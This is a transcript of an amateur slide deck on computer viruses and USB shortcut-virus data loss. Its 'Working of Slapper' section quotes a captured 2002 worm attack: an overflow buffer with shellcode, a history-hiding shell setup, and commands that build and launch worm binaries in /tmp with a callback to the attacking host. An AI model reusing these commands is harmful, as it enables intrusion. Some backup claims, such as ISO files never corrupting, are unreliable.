Virus & data protection by DKSoft

transcript

Virus & Data Protection

– Research by DKSoft...

Definitions of Virus History of Virus Goal & Properties of VirusWorking of a Slapper (Worm Virus) Common experience of losing data

Overview of Virus History of Virus Special Types of Trojans (Major Type of Virus) Concept of latest Trojans Virus Program Execution Working of a Slapper (Worm Virus) Data loss Data Protection Recommended Anti-Virus Softwares

Agenda

Virus – Malicious program with set of destructive codes that startsreplicating to infect OS or user data when accessed it

Major Types of Viruses: Trojan Horse

Overview of Virus

Some Features of Virus: locates & infects “.exe”, “.com”, “.dll” files Delete Files, Shutdown Programs, Eat up System

resources, hide or alter data VB & Command Scripts contain Assembly code for

Virus replication (Optional)

Hex dump of a worm leaving message for Bill Gates III

1. Elk Cloner :

First real Virus written by Richard Skrenta for Apple II It will stick to all the disks It can also modify RAM

2. “Brain“ – First major PC Virus found in Lahore, Pakistan

Boot Sector of a Floppy infected by “Brain”

History of Virus

Special Types of Trojans

Exploit – Spread malicious data in OS

Backdoor – Created to give access of a Computer to unauthorized user

DDoS – Causes Web Address to fail

Tiny Trojan Banker – Steals Bank details of a user or organizaton

FakeAV – Convinces user that the PC is infected with Virus

Ransom – Designed for crime which modifies or blocks dataon a Computer & the data in the Computer

Downloader – Programmed to download & install newmalicious programs

Spy – Invisible to user & observes Computer activitiessilently by taking screenshots

SpyEye – Targets Airline Travel & Banking Websites

Zeus – Steals banking details & personal data, participatein fraud schemes & other criminal works

AIDS – Infects “.exe” & “.com” files

Concept of latest Trojan

Shortcut file--------------------Address------------X-----------Hidden Datacmd.exe------------opens-----------explorer.exe

Step 1: Waits till it is accessed by user or Anti-VirusStep 2: Sticks to specified System FilesStep 3: Permanently hides all Files & Folders present in External DrivesStep 4: Creates shortcuts of all the Files & Folders present in External DrivesStep 5: Opens particular File/Folder when its shortcut file is accessedStep 6: Some Virus uses VB or Command scripts for replication & some have

capacity to self replicate inside the all External Drives connected to the infected Computer

Shortcut----cmd.exe----explorer.exe----Hidden Data

The shortcut file is at front end & at back end, it contans address of the hidden data

Infected programNormal program

Virus Program Execution

Working of Slapper

Slapper Requesting

HTTP/1.1 400 Bad Request..Date: Sun, 22 Sep 2002 03:41:10

GMT..Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4

OpenSSL/0.9.6b DAV/1.0.2 PHP/ 4.0.6 mod_perl/1.24_01..Connection:

close..Transfer-Encoding: chunked..Content-Type: text/html;

charset=iso-8859-1....169..<!DOCTYPE HTML PUBLIC "-//IETF//DTD

HTML 2.0//EN">.<HTML><HEAD>.<TITLE>400 Bad quest</TITLE>. </HEAD>

<BODY>.<H1>Bad Request</H1>.Your browser sent a request that this

server could not understand.<P>.client sent HTTP/1.1 request

without hostname (see RFC2616 section 14.23): <P>. <HR>.

<ADDRESS>Apache/1.3.20 Server at 127.0.0.1 Port

80</ADDRESS>.</BODY></HTML>...0....

68.168.1.15:52160 -> 127.0.0.1:80

GET / HTTP/1.1....

127.0.0.1:80 -> 68.168.1.15:52160 :52160

Slapper Attacking

...........N..zCyhy...i..B...y...c....t...D.1..9P`.8../9...-

..............hjE.H.o.,B...."Oo...:.....'...i..%._~-

...Z...RqAJX...p3.....p5o.j.../4/.H,AAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA........AAAA....AAAAAAAAAAAA..G

@AAAA............AAAAAAAA....................................1...

.w..w..O.O.....1.....Q1..f......Y1.9.u.f..Xf9F.t.....1...1..?I..A

..1...Q[....1.Ph//shh/bin..PS.......

68.168.1.15:52312 -> 127.0.0.1:443

export TERM=xterm;export HOME=/tmp;export

HISTFILE=/dev/null; export

PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin;exec bash -i.

68.168.1.15:52312 -> 127.0.0.1:443

Compiling and Installing

rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c /tmp/httpd

/tmp/update; exit; .

68.168.1.15:52312 -> 127.0.0.1:443

rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c

/tmp/httpd /tmp /update /tmp/.unlock; .cat > /tmp/.unlock.uu <<

__eof__; .begin 655 .unlock

[worm source code, in uuencoded format, omitted]

68.168.1.15:52312 -> 127.0.0.1:443

uudecode -o /tmp/.unlock /tmp/.unlock.uu; tar xzf /tmp/.unlock -

C /tmp/;gcc -o /tmp/httpd /tmp/.unlock.c -lcrypto; gcc -o

/tmp/update /tmp/.update.c;./tmp/httpd 68.168.1.15; /tmp/update;

68.168.1.15:52312 -> 127.0.0.1:443

obs: XXXX XXXX == localhost IP

YYYY YYYY == worm_host IP

0x70 == Incomming client flag

127.0.0.1.4156 > 68.168.1.15.4156: udp 28 (DF)

0x0000 4500 0038 0000 4000 4011 beb3 XXXX XXXX E..8..@.@.......

0x0010 YYYY YYYY 103c 103c 0024 92cb 0000 0000 ...'.<.<.$......

0x0020 8fff 0000 25b8 aaa8 7000 0000 0000 0000 ....%...p.......

Remote Communications

Data Loss

Firstly, when a Virus infected Pendrive is inserted to a non-infected PC, every data present in Pendrive will be in shortcut forms usually with 1KB or 2KB size (or more in rare cases)

Secondly, user will open a folder (shortcut file) & feels that entire the data is safe. But, this is when the virus spreads to the PC & all the External Devices connected in future

User scans & commands the Anti-Virus to take proper actions

Anti-Virus deletes shortcut files present in the scanned Pendrive

After scanning, user opens the scanned Pendrive. “OMG ! , I lost my important data”

The Virus re-appeared even in a non-infected Pendrive. It spreads & replicates in all non-infected/infected External USB Devices

Data Protection

When a virus infected Pendrive is inserted to a non-infected PC, note that every data present in Pendrive will be in shortcuts. Never touch the shortcut files.

Go to “Folder Options” present in “Control Panel”

Click on “View” tab present at the top of “Folder Options”

1. Mark “Show hidden files, folders and drives”2. Untick “Hide protected operating system files

(Recommended)”3. Again open the same Pendrive

VB Scrpt & its shortcut (Trojan Virus) containing code for Virus to replicate

Original User data permanently hidden

Trojan or Worm viruses (as shortcuts to the Original Data)

“.Trashes” file present at the top contains address of Recycle Bin

Properties of Trojan (shortcut)

Properties of user data folder

If files are present inside a folder, then they are 99.99% safe. It can be copied or moved to any other directories avoid data corruption

Scan & take a safe copy of required data from the hidden folder

Never touch the auto-created shortcut files or unknown files

Read Privacy Statements

Understand what you are getting before you agree to download or share your personal information

Think Before You Click

Be cautious with e-mail attachments and links

Only download files from Web sites you trust

Safely remove External Drives, Shutdown Computer properly & dontsave data in System Partititon

Use Power ISO, Win ISO, Ultra ISO, Magic ISOor any other Softwares for Data Backup

Virus can be kidnapped & kept inside “.iso” file as locker

Advantages of creating “.iso” Image Data

Easy to create Never corruptsMount to a Virtual Drive & Access at high speed Provides very tight security for data stored in it OS or Anti-Virus cannot modify or delete its data

without user’s permission Portable with all OS supporting “.iso” Image DataWill not compress Data

SkyLabs Kaspersky

Symantec Norton

Bitdefender

Trend Micro

MS Essentials

Recommended Anti-Virus based on security levelsRecommended Anti-Virus by popularity levels

SkyLabs Kaspersky

Bitdefender

Symantec Norton

MS Essentials

Trend Micro

– Research continued by DKSoft...

dksoft2015.blogspot.in

Virus & data protection by DKSoft

Documents